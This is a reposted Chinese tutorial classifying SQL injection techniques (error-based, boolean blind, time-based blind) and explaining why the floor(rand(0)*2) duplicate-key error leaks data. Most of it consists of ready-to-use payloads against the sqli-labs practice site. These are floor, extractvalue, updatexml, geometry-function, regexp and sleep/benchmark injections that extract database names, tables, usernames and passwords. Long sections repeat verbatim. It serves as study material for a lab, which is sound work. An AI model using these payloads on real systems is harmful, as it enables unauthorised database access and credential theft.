1.1 sql注入分类与详解
生活随笔
收集整理的這篇文章主要介紹了
1.1 sql注入分类与详解
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
1.基于報錯的 SQL 盲注------構造 payload 讓信息通過錯誤提示回顯出來 ? ?
這里來講一下報錯注入的原理(floor型爆錯注入): 0x01:報錯過程: 1.rand()用于產生一個0~1的隨機數 2.floor()向下取整 3.rand()函數生成0~1的任意數字,使用floor函數向下取整,值是固定的0, 如果是rand()*2,向下取整后為0或1 ?4.concat()將符合條件的同一列中的不同行數據進行拼接,0x3a是":"的16進制
select count(*),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name; 多次刷新 竟然真的爆出了表的名字,我們還可以通過改變limit 0,1 來獲取更多地表名 這里順便補充一下limit 0,1 的用法??: select * from table limit m,n 其中m是指記錄開始的index,從0開始,表示第一條記錄,n是指從第m+1條開始,取n條。 limit是mysql的語法 select * from table limit m,n 其中m是指記錄開始的index,從0開始,表示第一條記錄 n是指從第m+1條開始,取n條。 select * from tablename limit 2,4 即取出第3條至第6條,4條記 同理我們換成比較麻煩的來爆出表的名字 http://127.0.0.1/sqlilabs/Less-5/?id=-1' and (select 1 from (select count(*),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name)b)%2 http://127.0.0.1/sqlilabs/Less-5/?id=-1' and (select 1 from (select count(*),concat(0x3a,0x3a,(select column_name from information_schema.columns where table_name='users' limit 2,1),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name)b)%23 我們可以找到username,password字段 http://127.0.0.1/sqlilabs/Less-5/?id=-1' and (select 1 from (select count(*),concat(0x3a,0x3a,(select username from users limit 2,1),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name)b)%23 可以爆出用戶名
http://127.0.0.1/sqlilabs/Less-5/?id=-1' and (select 1 from (select count(*),concat(0x3a,0x3a,(select password from users limit 2,1),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name)b)%23 可以爆出用戶名對應的用戶密碼 其他方法 1、通過floor報錯,注入語句如下: 爆數據庫: http://127.0.0.1/sqlilabs/Less-5/?id=-1' and (select 1 from (select count(*),concat(0x3a,0x3a,database(),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name)b)%23 爆表: http://127.0.0.1/sqlilabs/Less-5/?id=-1' and (select 1 from (select count(*),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name)b)%23 爆字段: http://127.0.0.1/sqlilabs/Less-5/?id=-1' and (select 1 from (select count(*),concat(0x3a,0x3a,(select column_name from information_schema.columns where table_name='users' limit 2,1),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name)b)%23 爆用戶名: http://127.0.0.1/sqlilabs/Less-5/?id=-1' and (select 1 from (select count(*),concat(0x3a,0x3a,(select username from users limit 2,1),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name)b)%23 爆密碼: http://127.0.0.1/sqlilabs/Less-5/?id=-1' and (select 1 from (select count(*),concat(0x3a,0x3a,(select password from users limit 2,1),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name)b)%232、通過ExtractValue報錯,注入語句如下: 爆數據庫: and extractvalue(1, concat(0x5c, (select database()),0x5c));爆表: and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables where table_schema=database() limit 0,1),0x5c));爆字段: and extractvalue(1, concat(0x5c, (select column_name from information_schema.columns where table_name='users' limit 0,1),0x5c));爆用戶: and extractvalue(1, concat(0x5c, (select username from users limit 0,1),0x5c));爆密碼:and extractvalue(1, concat(0x5c, (select password from users limit 0,1),0x5c));3、通過UpdateXml報錯,注入語句如下:爆數據庫:and 1=(updatexml(1,concat(0x3a,(select database()),0x3a),1))爆表: and 1=(updatexml(1,concat(0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a),1))爆字段: and 1=(updatexml(1,concat(0x3a,(select column_name from information_schema.columns where table_name='users' limit 0,1),0x3a),1))爆用戶: and 1=(updatexml(1,concat(0x3a,(select username from users limit 0,1),0x3a),1))爆密碼: and 1=(updatexml(1,concat(0x3a,(select password from users limit 0,1),0x3a),1))4.通過geometrycollection()報錯,注入語句如下:select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));5.通過multipoint()報錯,注入語句如下:select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));6.通過polygon()報錯,注入語句如下:select * from test where id=1 and polygon((select * from(select * from(select user())a)b));7.通過multipolygon()報錯,注入語句如下:select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));8.通過linestring()報錯,注入語句如下:select * from test where id=1 and linestring((select * from(select * from(select user())a)b));9.通過multilinestring()報錯,注入語句如下:select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));10.通過exp()報錯,注入語句如下:select * from test where id=1 and exp(~(select * from(select user())a));
2:基于布爾 SQL 盲注----------構造邏輯判斷 ?1:基于布爾 SQL 盲注----------構造邏輯判斷 left(database(),1)>’s’ //left()函數 Explain: database()顯示數據庫名稱,left(a,b)從左側截取 a 的前 b 位 上面語句也就是判斷數據庫的第一位的ascill的值是否大于8,如果是頁面就返回正常 用法:http://127.0.0.1/sqlilabs/Less-7/?id=1' and left(database())>=8%23 ascii(substr((select table_name information_schema.tables where tables_schema =database() limit 0,1),1,1))=101 --+ //substr()函數,ascii()函數 Explain:substr(a,b,c)從 b 位置開始,截取字符串 a 的 c 長度。Ascii()將某個字符轉換 為 ascii 值 ascii(substr((select database()),1,1))=98
ORD(MID((SELECT IFNULL(CAST(username AS CHAR),0x20)FROM security.users ORDER BY id LIMIT 0,1),1,1))>98%23 //ORD()函數,MID()函數 Explain:mid(a,b,c)從位置 b 開始,截取 a 字符串的 c 位? ? ? ?Ord()函數同 ascii(),將字符轉為 ascii 值 ▲regexp 正則注入 正則注入介紹:http://www.cnblogs.com/lcamry/articles/5717442.html 用法介紹: select user() regexp '^[a-z]'; Explain:正則表達式的用法,user()結果為 root,regexp 為匹配 root 的正則表達式。 第二位可以用? select user() regexp '^ro' 來進行。 示例介紹:? select * from users where id=1 and 1=(if((user() regexp '^r'),1,0));
select * from users where id=1 and 1=(user() regexp'^ri'); 通過 if 語句的條件判斷,返回一些條件句,比如 if 等構造一個判斷。根據返回結果是否等 于 0 或者 1 進行判斷。? select * from users where id=1 and 1=(select 1 from information_schema.tables where table_schema='security' and table_name regexp '^us[a-z]' limit 0,1); 這里利用 select 構造了一個判斷語句。我們只需要更換 regexp 表達式即可 '^u[a-z]' -> '^us[a-z]' -> '^use[a-z]' -> '^user[a-z]' -> FALSE 如何知道匹配結束了?這里大部分根據一般的命名方式(經驗)就可以判斷。但是如何你在 無法判斷的情況下,可以用 table_name regexp '^username$ '來進行判斷。^是從開頭進行 匹配,$是從結尾開始判斷。更多的語法可以參考 mysql 使用手冊進行了解
3:基于時間的 SQL 盲注----------延時注入 If(ascii(substr(database(),1,1))>115,0,sleep(5))%23 //if 判斷語句,條件為假, 執行 sleep Ps:遇到以下這種利用 sleep()延時注入語句 select sleep(find_in_set(mid(@@version, 1, 1), '0,1,2,3,4,5,6,7,8, 9,.')); 該語句意思是在 0-9 之間找版本號的第一位。但是在我們實際滲透過程中,這種用法是不可 取的,因為時間會有網速等其他因素的影響,所以會影響結果的判斷。 UNION SELECT IF(SUBSTRING(current,1,1)=CHAR(119),BENCHMARK(5000000,ENCODE(‘M SG’,’by 5 seconds’)),null) FROM (select database() as current) as tb1; //BENCHMARK(count,expr)用于測試函數的性能,參數一為次數,二為要執行的表達 式。可以讓函數執行若干次,返回結果比平時要長,通過時間長短的變化,判斷語句是否執 行成功。這是一種邊信道攻擊,在運行過程中占用大量的 cpu 資源。推薦使用 sleep() 函數進行注入。 猜測數據庫: http://127.0.0.1/sqllib/Less-9/?id=1%27and%20If(ascii(substr(database(),1,1))=115,1,sleep(5))--+ 說明第一位是 s (ascii 碼是 115) http://127.0.0.1/sqllib/Less-9/?id=1%27and%20If(ascii(substr(database(),2,1))=101,1,sleep(5))--+ 說明第二位是 e (ascii 碼是 101) .... 以此類推,我們知道了數據庫名字是 security 猜測 security 的數據表: http://127.0.0.1/sqllib/Less-9/?id=1'and If(ascii(substr((select table_name from information_s chema.tables where table_schema='security' limit 0,1),1,1))=101,1,sleep(5))--+ ?猜測第一個數據表的第一位是 e,... 依次類推,得到 emails http://127.0.0.1/sqllib/Less-9/?id=1'and If(ascii(substr((select table_name from information_s chema.tables where table_schema='security' limit 1,1),1,1))=114,1,sleep(5))--+ 猜測第二個數據表的第一位是 r,... 依次類推,得到 referers ... 再以此類推,我們可以得到所有的數據表 emails,referers,uagents,users 猜測 users 表的列: http://127.0.0.1/sqllib/Less-9/?id=1'and If(ascii(substr((select column_name from information _schema.columns where table_name='users' limit 0,1),1,1))=105,1,sleep(5))--+ 猜測 users 表的第一個列的第一個字符是 i, 以此類推,我們得到列名是 id,username,password ```````````````` 猜測 username 的值: http://127.0.0.1/sqllib/Less-9/?id=1'and If(ascii(substr((select username from users limit 0,1), 1,1))=68,1,sleep(5))--+ 猜測 username 的第一行的第一位 以此類推,我們得到數據庫 username,password 的所有內容 以上的過程就是我們利用 sleep()函數注入的整個過程,當然了可以離開 BENCHMARK()函數進 行注入,這里可以自行進行測試。我們這里就不進行演示了
這里來講一下報錯注入的原理(floor型爆錯注入): 0x01:報錯過程: 1.rand()用于產生一個0~1的隨機數 2.floor()向下取整 3.rand()函數生成0~1的任意數字,使用floor函數向下取整,值是固定的0, 如果是rand()*2,向下取整后為0或1 ?4.concat()將符合條件的同一列中的不同行數據進行拼接,0x3a是":"的16進制
5.將之前的rand()函數和floor函數結合起來
6.查詢出來的名字太長,我們來起個別名
7.我們再一次查詢,information_schema.tables有多少個表格,會顯示多少列
?
8.group by依據我們想要的規矩對結果進行分組
9.count()統計元素的個數
10.我們多重復幾次
?
0x02:rand()和rand(0)
1.根據剛才的運行結果,發現不加隨機因子,執行2次就會報錯,我們加上隨機因子
看一下結果:
發現每一次都報錯,是不是說明報錯語句有了floor(rand(0)*2)以及其他條件就一定報錯,
驗證一下,先建個表test,先只增加一條記錄:
然后我們執行報錯語句:
多次執行均沒有發現報錯
我們新增一條記錄:
我們繼續執行報錯語句:
多次執行還是沒有發現報錯
我們再新增一條記錄:
?
我們測試一下報錯語句:
?成功報錯了
由此證明floor(rand(0)*2)的報錯是有條件的,記錄數必須大于等于3條,3條以上必定報錯
?
0x03 確定性與不確定性
根據上面的驗證,我們發現:
floor(rand()*2):二條記錄隨機出錯
floor(rand(0)*2):三條記錄以上一定報錯
由此可以猜想,floor(rand()*2)是比較隨機的,不具備確定性因素,而floor(rand(0)*2)具備某方面的確定性
floor(rand(0)*2) :報錯的原理恰恰是由于他的確定性
我們分別執行觀察:
floor(rand()*2):
發現連續三次查詢,沒有一點規律
floor(rand(0)*2) :
發現連續三次查詢都是有規律的,而且是固定的,這就是上面說的由于確定性才導致的爆錯
?
0x04 count與group by的虛擬表
我們先看下來查詢結果:
可以看出test5的記錄有3條
與count(*)的結果相符合,如果mysql遇到了select count(*) from test group by name;
這種語句,會先建立一個虛擬表:
當開始查詢數據時,從數據庫中取出數據,看在虛擬表中是否有同樣的記錄, 如果有,就在count(*)字段+1,如果沒有就直接插入新記錄:可這怎么引起報錯?
?
0x05 floor(rand(0)*2)爆錯
其實官方mysql給過提示,就是查詢如果使用rand()的話,該值會被計算多次,也就是在使用group by 的時候,floor(rand(0)*2)會被執行一次,如果虛擬表中不存在記錄,把數據插入虛擬表中時會再被執行一次。在0x03中我們發現floor(rand(0)*2)的值具有確定性,為01101100111011,報錯實際上是floor(rand(0)*2)被多次計算所導致,具體看一下select count(*) from test group by floor(rand(0)*2);
1.查詢前會建立虛擬表
2.取第一條記錄,執行floor(rand(0)*2),發現結果為0(第一次計算),查詢虛擬表,發現0的鍵值不存在,則floor(rand(0)*2)會被再計算一遍,結果為1(第二次計算),插入虛擬表,這時第一條記錄查詢完畢:
?
?3.查詢第二條記錄,再次計算floor(rand(0)*2),發現結果為1(第三次計算),查詢虛擬表,發現1的鍵值存在(上圖),所以floor(rand(0)*2)不會被計算第二次,直接count(*)+1,第二條記錄查詢完畢:
4.查詢第三條記錄,再次計算floor(rand(0)*2),發現結果為0(第四次計算),查詢虛擬表,發現0的鍵值不存在,則虛擬表嘗試插入一條新的數據,在插入數據時floor(rand(0)*2)被再次計算,結果為1(第五次計算),然而1這個主鍵已經存在于虛擬表中,而新計算的值也為1(應為主鍵鍵值必須唯一),所以插入時直接報錯了。
5.整個查詢過程floor(rand(0)*2)被計算了5次,查詢了3次紀錄,這就是為什么數據表中需要3條數據,這也就是使用該語句會報錯的原因
?
0x06 flood(rand()*2)爆錯
由0x01,0x02我們發現flood(rand()*2),具有隨機性,
最重要的是前面幾條記錄查詢后不能讓虛擬表存在0,1鍵值,如果存在了,那無論多少條記錄都無法報錯,應為floor(rand()*2)不會再被計算作為虛擬表的鍵值,這也就是為什么不加隨機因子的時候會報錯,有時候不報錯:
這樣的話,就算查詢多少條記錄,都不會再次被計算,只是簡單的count(*)+1,所以不會報錯
比如floor(rand(1)*2):
前兩條記錄查詢過之后,虛擬表中已經存在0,1的鍵值了,所以后面只會在count(*)上面加,后面不會再爆錯
這就是floor型報錯注入的原理與過程
?--------------------------------------------------------------------------------
? information_schema這張數據表保存了MySQL服務器所有數據庫的信息。如數據庫名, 數據庫的表,表欄的數據類型與訪問權限等。再簡單點,這臺MySQL服務器上,到底有哪些數 據庫、各個數據庫有哪些表,每張表的字段類型是什么,各個數據庫要什么權限才能訪問,等 等信息都保存在information_schema表里面。 爆出數據庫中的所有數據庫名: select schema_name from information_schema.schemata;爆出數據庫中所有表名:
select table_name from information_schema.tables; 爆出數據庫中的列名: select column_name from information_schema.columns where table_name='wp_users'; ? 爆出字段具體的值: select table_name,table_schema from information_schema.tables group by table_schema; select group_concat(0x3a,0x3a,database(),0x3a,0x3a,floor(rand()*2))name; 0x3a是 :的16進制 -————------ | name????????| ---------------? ? ? ? |::security::0| --------------- 或者 -————------ | name????????| ---------------? ? ? ? |::security::1| --------------- concat()? : 連接兩個或多個數組 select count(*),concat(0x3a,0x3a,database(),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name; -------————----------------- |? ? ? ? ? ? ? ? ? ?|? ? ? ? ? ? ? ? ? ? | | count(*)?????|?????name??????| -------------------------------- |? ? ? ? ? ? ? ? ? ?|? ? ? ? ? ? ? ? ? ?| |?????45? ? ? ? ? |::security::0??| |? ? ? ? ? ? ? ? ? ?|? ? ? ? ? ? ? ? ? ? | |?????41? ? ? ? ? |::security::1??| -------------------------------- 但是刷新幾次發現了一個錯誤: ERROR 1062(23000):Duplicate entry'::security::1' for key 'group_key';?但是這個錯誤卻爆出了當前數據庫名,這對我們SQL注入是有用的,同理,我們可以換成不同的函數來獲取信息
select count(*),concat(0x3a,0x3a,version(),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name; 刷新多遍,發現這個錯誤果然可以爆出數據庫的版本信息 這樣的話,我們可以嘗試爆表select count(*),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name; 多次刷新 竟然真的爆出了表的名字,我們還可以通過改變limit 0,1 來獲取更多地表名 這里順便補充一下limit 0,1 的用法??: select * from table limit m,n 其中m是指記錄開始的index,從0開始,表示第一條記錄,n是指從第m+1條開始,取n條。 limit是mysql的語法 select * from table limit m,n 其中m是指記錄開始的index,從0開始,表示第一條記錄 n是指從第m+1條開始,取n條。 select * from tablename limit 2,4 即取出第3條至第6條,4條記 同理我們換成比較麻煩的來爆出表的名字 http://127.0.0.1/sqlilabs/Less-5/?id=-1' and (select 1 from (select count(*),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name)b)%2 http://127.0.0.1/sqlilabs/Less-5/?id=-1' and (select 1 from (select count(*),concat(0x3a,0x3a,(select column_name from information_schema.columns where table_name='users' limit 2,1),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name)b)%23 我們可以找到username,password字段 http://127.0.0.1/sqlilabs/Less-5/?id=-1' and (select 1 from (select count(*),concat(0x3a,0x3a,(select username from users limit 2,1),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name)b)%23 可以爆出用戶名
http://127.0.0.1/sqlilabs/Less-5/?id=-1' and (select 1 from (select count(*),concat(0x3a,0x3a,(select password from users limit 2,1),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name)b)%23 可以爆出用戶名對應的用戶密碼 其他方法 1、通過floor報錯,注入語句如下: 爆數據庫: http://127.0.0.1/sqlilabs/Less-5/?id=-1' and (select 1 from (select count(*),concat(0x3a,0x3a,database(),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name)b)%23 爆表: http://127.0.0.1/sqlilabs/Less-5/?id=-1' and (select 1 from (select count(*),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name)b)%23 爆字段: http://127.0.0.1/sqlilabs/Less-5/?id=-1' and (select 1 from (select count(*),concat(0x3a,0x3a,(select column_name from information_schema.columns where table_name='users' limit 2,1),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name)b)%23 爆用戶名: http://127.0.0.1/sqlilabs/Less-5/?id=-1' and (select 1 from (select count(*),concat(0x3a,0x3a,(select username from users limit 2,1),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name)b)%23 爆密碼: http://127.0.0.1/sqlilabs/Less-5/?id=-1' and (select 1 from (select count(*),concat(0x3a,0x3a,(select password from users limit 2,1),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name)b)%232、通過ExtractValue報錯,注入語句如下: 爆數據庫: and extractvalue(1, concat(0x5c, (select database()),0x5c));爆表: and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables where table_schema=database() limit 0,1),0x5c));爆字段: and extractvalue(1, concat(0x5c, (select column_name from information_schema.columns where table_name='users' limit 0,1),0x5c));爆用戶: and extractvalue(1, concat(0x5c, (select username from users limit 0,1),0x5c));爆密碼:and extractvalue(1, concat(0x5c, (select password from users limit 0,1),0x5c));3、通過UpdateXml報錯,注入語句如下:爆數據庫:and 1=(updatexml(1,concat(0x3a,(select database()),0x3a),1))爆表: and 1=(updatexml(1,concat(0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a),1))爆字段: and 1=(updatexml(1,concat(0x3a,(select column_name from information_schema.columns where table_name='users' limit 0,1),0x3a),1))爆用戶: and 1=(updatexml(1,concat(0x3a,(select username from users limit 0,1),0x3a),1))爆密碼: and 1=(updatexml(1,concat(0x3a,(select password from users limit 0,1),0x3a),1))4.通過geometrycollection()報錯,注入語句如下:select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));5.通過multipoint()報錯,注入語句如下:select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));6.通過polygon()報錯,注入語句如下:select * from test where id=1 and polygon((select * from(select * from(select user())a)b));7.通過multipolygon()報錯,注入語句如下:select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));8.通過linestring()報錯,注入語句如下:select * from test where id=1 and linestring((select * from(select * from(select user())a)b));9.通過multilinestring()報錯,注入語句如下:select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));10.通過exp()報錯,注入語句如下:select * from test where id=1 and exp(~(select * from(select user())a));
2:基于布爾 SQL 盲注----------構造邏輯判斷 ?1:基于布爾 SQL 盲注----------構造邏輯判斷 left(database(),1)>’s’ //left()函數 Explain: database()顯示數據庫名稱,left(a,b)從左側截取 a 的前 b 位 上面語句也就是判斷數據庫的第一位的ascill的值是否大于8,如果是頁面就返回正常 用法:http://127.0.0.1/sqlilabs/Less-7/?id=1' and left(database())>=8%23 ascii(substr((select table_name information_schema.tables where tables_schema =database() limit 0,1),1,1))=101 --+ //substr()函數,ascii()函數 Explain:substr(a,b,c)從 b 位置開始,截取字符串 a 的 c 長度。Ascii()將某個字符轉換 為 ascii 值 ascii(substr((select database()),1,1))=98
ORD(MID((SELECT IFNULL(CAST(username AS CHAR),0x20)FROM security.users ORDER BY id LIMIT 0,1),1,1))>98%23 //ORD()函數,MID()函數 Explain:mid(a,b,c)從位置 b 開始,截取 a 字符串的 c 位? ? ? ?Ord()函數同 ascii(),將字符轉為 ascii 值 ▲regexp 正則注入 正則注入介紹:http://www.cnblogs.com/lcamry/articles/5717442.html 用法介紹: select user() regexp '^[a-z]'; Explain:正則表達式的用法,user()結果為 root,regexp 為匹配 root 的正則表達式。 第二位可以用? select user() regexp '^ro' 來進行。 示例介紹:? select * from users where id=1 and 1=(if((user() regexp '^r'),1,0));
select * from users where id=1 and 1=(user() regexp'^ri'); 通過 if 語句的條件判斷,返回一些條件句,比如 if 等構造一個判斷。根據返回結果是否等 于 0 或者 1 進行判斷。? select * from users where id=1 and 1=(select 1 from information_schema.tables where table_schema='security' and table_name regexp '^us[a-z]' limit 0,1); 這里利用 select 構造了一個判斷語句。我們只需要更換 regexp 表達式即可 '^u[a-z]' -> '^us[a-z]' -> '^use[a-z]' -> '^user[a-z]' -> FALSE 如何知道匹配結束了?這里大部分根據一般的命名方式(經驗)就可以判斷。但是如何你在 無法判斷的情況下,可以用 table_name regexp '^username$ '來進行判斷。^是從開頭進行 匹配,$是從結尾開始判斷。更多的語法可以參考 mysql 使用手冊進行了解
3:基于時間的 SQL 盲注----------延時注入 If(ascii(substr(database(),1,1))>115,0,sleep(5))%23 //if 判斷語句,條件為假, 執行 sleep Ps:遇到以下這種利用 sleep()延時注入語句 select sleep(find_in_set(mid(@@version, 1, 1), '0,1,2,3,4,5,6,7,8, 9,.')); 該語句意思是在 0-9 之間找版本號的第一位。但是在我們實際滲透過程中,這種用法是不可 取的,因為時間會有網速等其他因素的影響,所以會影響結果的判斷。 UNION SELECT IF(SUBSTRING(current,1,1)=CHAR(119),BENCHMARK(5000000,ENCODE(‘M SG’,’by 5 seconds’)),null) FROM (select database() as current) as tb1; //BENCHMARK(count,expr)用于測試函數的性能,參數一為次數,二為要執行的表達 式。可以讓函數執行若干次,返回結果比平時要長,通過時間長短的變化,判斷語句是否執 行成功。這是一種邊信道攻擊,在運行過程中占用大量的 cpu 資源。推薦使用 sleep() 函數進行注入。 猜測數據庫: http://127.0.0.1/sqllib/Less-9/?id=1%27and%20If(ascii(substr(database(),1,1))=115,1,sleep(5))--+ 說明第一位是 s (ascii 碼是 115) http://127.0.0.1/sqllib/Less-9/?id=1%27and%20If(ascii(substr(database(),2,1))=101,1,sleep(5))--+ 說明第二位是 e (ascii 碼是 101) .... 以此類推,我們知道了數據庫名字是 security 猜測 security 的數據表: http://127.0.0.1/sqllib/Less-9/?id=1'and If(ascii(substr((select table_name from information_s chema.tables where table_schema='security' limit 0,1),1,1))=101,1,sleep(5))--+ ?猜測第一個數據表的第一位是 e,... 依次類推,得到 emails http://127.0.0.1/sqllib/Less-9/?id=1'and If(ascii(substr((select table_name from information_s chema.tables where table_schema='security' limit 1,1),1,1))=114,1,sleep(5))--+ 猜測第二個數據表的第一位是 r,... 依次類推,得到 referers ... 再以此類推,我們可以得到所有的數據表 emails,referers,uagents,users 猜測 users 表的列: http://127.0.0.1/sqllib/Less-9/?id=1'and If(ascii(substr((select column_name from information _schema.columns where table_name='users' limit 0,1),1,1))=105,1,sleep(5))--+ 猜測 users 表的第一個列的第一個字符是 i, 以此類推,我們得到列名是 id,username,password ```````````````` 猜測 username 的值: http://127.0.0.1/sqllib/Less-9/?id=1'and If(ascii(substr((select username from users limit 0,1), 1,1))=68,1,sleep(5))--+ 猜測 username 的第一行的第一位 以此類推,我們得到數據庫 username,password 的所有內容 以上的過程就是我們利用 sleep()函數注入的整個過程,當然了可以離開 BENCHMARK()函數進 行注入,這里可以自行進行測試。我們這里就不進行演示了
?
轉載于:https://www.cnblogs.com/bmjoker/p/8797027.html
總結
以上是生活随笔為你收集整理的1.1 sql注入分类与详解的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 【Java并发编程】之八:多线程环境中安
- 下一篇: spark源码编译